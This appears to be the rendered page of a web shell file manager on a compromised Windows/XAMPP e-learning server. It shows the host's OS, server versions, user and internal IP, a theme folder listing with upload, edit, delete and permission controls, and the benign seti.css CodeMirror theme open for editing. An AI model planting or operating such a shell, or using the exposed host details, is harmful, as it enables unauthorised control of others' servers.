[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
vendor
/
codemirror
/
theme
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 3024-night.css
2,076 B
SET
[ EDIT ]
|
[ DEL ]
📄 ambiance.css
26,493 B
SET
[ EDIT ]
|
[ DEL ]
📄 ayu-dark.css
2,421 B
SET
[ EDIT ]
|
[ DEL ]
📄 blackboard.css
1,931 B
SET
[ EDIT ]
|
[ DEL ]
📄 cobalt.css
1,726 B
SET
[ EDIT ]
|
[ DEL ]
📄 colorforth.css
1,677 B
SET
[ EDIT ]
|
[ DEL ]
📄 darcula.css
2,686 B
SET
[ EDIT ]
|
[ DEL ]
📄 duotone-dark.css
2,614 B
SET
[ EDIT ]
|
[ DEL ]
📄 eclipse.css
1,187 B
SET
[ EDIT ]
|
[ DEL ]
📄 elegant.css
781 B
SET
[ EDIT ]
|
[ DEL ]
📄 gruvbox-dark.css
1,918 B
SET
[ EDIT ]
|
[ DEL ]
📄 hopscotch.css
1,469 B
SET
[ EDIT ]
|
[ DEL ]
📄 juejin.css
517 B
SET
[ EDIT ]
|
[ DEL ]
📄 lesser-dark.css
2,637 B
SET
[ EDIT ]
|
[ DEL ]
📄 material-darker.css
2,607 B
SET
[ EDIT ]
|
[ DEL ]
📄 material-palenight.css
2,923 B
SET
[ EDIT ]
|
[ DEL ]
📄 material.css
2,533 B
SET
[ EDIT ]
|
[ DEL ]
📄 mbo.css
2,112 B
SET
[ EDIT ]
|
[ DEL ]
📄 midnight.css
1,856 B
SET
[ EDIT ]
|
[ DEL ]
📄 monokai.css
2,179 B
SET
[ EDIT ]
|
[ DEL ]
📄 moxer.css
2,369 B
SET
[ EDIT ]
|
[ DEL ]
📄 neo.css
947 B
SET
[ EDIT ]
|
[ DEL ]
📄 night.css
1,746 B
SET
[ EDIT ]
|
[ DEL ]
📄 nord.css
2,088 B
SET
[ EDIT ]
|
[ DEL ]
📄 pastel-on-dark.css
2,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 railscasts.css
1,514 B
SET
[ EDIT ]
|
[ DEL ]
📄 seti.css
2,009 B
SET
[ EDIT ]
|
[ DEL ]
📄 shadowfox.css
2,440 B
SET
[ EDIT ]
|
[ DEL ]
📄 ssms.css
751 B
SET
[ EDIT ]
|
[ DEL ]
📄 the-matrix.css
1,940 B
SET
[ EDIT ]
|
[ DEL ]
📄 tomorrow-night-bright.css
1,769 B
SET
[ EDIT ]
|
[ DEL ]
📄 tomorrow-night-eighties.css
2,439 B
SET
[ EDIT ]
|
[ DEL ]
📄 ttcn.css
2,440 B
SET
[ EDIT ]
|
[ DEL ]
📄 vibrant-ink.css
2,142 B
SET
[ EDIT ]
|
[ DEL ]
📄 xq-dark.css
3,033 B
SET
[ EDIT ]
|
[ DEL ]
📄 yeti.css
1,884 B
SET
[ EDIT ]
|
[ DEL ]
📄 zenburn.css
2,001 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: seti.css
/* Name: seti Author: Michael Kaminsky (http://github.com/mkaminsky11) Original seti color scheme by Jesse Weed (https://github.com/jesseweed/seti-syntax) */ .cm-s-seti.CodeMirror { background-color: #151718 !important; color: #CFD2D1 !important; border: none; } .cm-s-seti .CodeMirror-gutters { color: #404b53; background-color: #0E1112; border: none; } .cm-s-seti .CodeMirror-cursor { border-left: solid thin #f8f8f0; } .cm-s-seti .CodeMirror-linenumber { color: #6D8A88; } .cm-s-seti.CodeMirror-focused div.CodeMirror-selected { background: rgba(255, 255, 255, 0.10); } .cm-s-seti .CodeMirror-line::selection, .cm-s-seti .CodeMirror-line > span::selection, .cm-s-seti .CodeMirror-line > span > span::selection { background: rgba(255, 255, 255, 0.10); } .cm-s-seti .CodeMirror-line::-moz-selection, .cm-s-seti .CodeMirror-line > span::-moz-selection, .cm-s-seti .CodeMirror-line > span > span::-moz-selection { background: rgba(255, 255, 255, 0.10); } .cm-s-seti span.cm-comment { color: #41535b; } .cm-s-seti span.cm-string, .cm-s-seti span.cm-string-2 { color: #55b5db; } .cm-s-seti span.cm-number { color: #cd3f45; } .cm-s-seti span.cm-variable { color: #55b5db; } .cm-s-seti span.cm-variable-2 { color: #a074c4; } .cm-s-seti span.cm-def { color: #55b5db; } .cm-s-seti span.cm-keyword { color: #ff79c6; } .cm-s-seti span.cm-operator { color: #9fca56; } .cm-s-seti span.cm-keyword { color: #e6cd69; } .cm-s-seti span.cm-atom { color: #cd3f45; } .cm-s-seti span.cm-meta { color: #55b5db; } .cm-s-seti span.cm-tag { color: #55b5db; } .cm-s-seti span.cm-attribute { color: #9fca56; } .cm-s-seti span.cm-qualifier { color: #9fca56; } .cm-s-seti span.cm-property { color: #a074c4; } .cm-s-seti span.cm-variable-3, .cm-s-seti span.cm-type { color: #9fca56; } .cm-s-seti span.cm-builtin { color: #9fca56; } .cm-s-seti .CodeMirror-activeline-background { background: #101213; } .cm-s-seti .CodeMirror-matchingbracket { text-decoration: underline; color: white !important; }